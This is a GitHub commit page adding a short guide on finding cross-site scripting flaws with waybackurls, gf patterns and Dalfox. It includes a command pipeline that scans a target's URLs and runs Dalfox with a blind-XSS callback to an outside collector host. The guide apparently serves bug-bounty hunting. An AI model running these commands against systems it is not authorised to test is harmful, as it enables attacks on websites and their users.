Skip to content

Commit

Permalink
New Stuff Added
Browse files Browse the repository at this point in the history
  • Loading branch information
fanimalikhack authored Aug 18, 2021
1 parent a6adcd3 commit 9924fb7
Showing 1 changed file with 8 additions and 3 deletions.
11 changes: 8 additions & 3 deletions XSS/Automated_XSS.md
Original file line number Diff line number Diff line change
Expand Up @@ -12,17 +12,22 @@ export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
source .bashrc
```

## How to Hunt XSS using QuickXSS?
## How to Hunt XSS using Dalfox?

- Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target
- Use GF patterns to find XSS Vulnerable URL's
- Use Dalfox to find XSS.

Check out my Blog to get a Detailed Explantion : [Blog Link](https://blog.theinfosecguy.me/post/automation-xss-using-dalfox/)
* Steps :
```
1) waybackurls target.com >> tee urls.txt
2)cat urls.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | sort -u |tee Possible_xss.txt
3)dalfox file Possible_xss.txt -b xsshunterpyload.xss.ht pipe
```


Find Script here : [QuickXSS](https://github.com/theinfosecguy/QuickXSS)


If you have any Questions, Reach out to me via [Twitter](https://twitter.com/g0t_rOoT_)

## Twitter : [Fani Malik](https://twitter.com/fanimalikhack)

0 comments on commit 9924fb7

Please sign in to comment.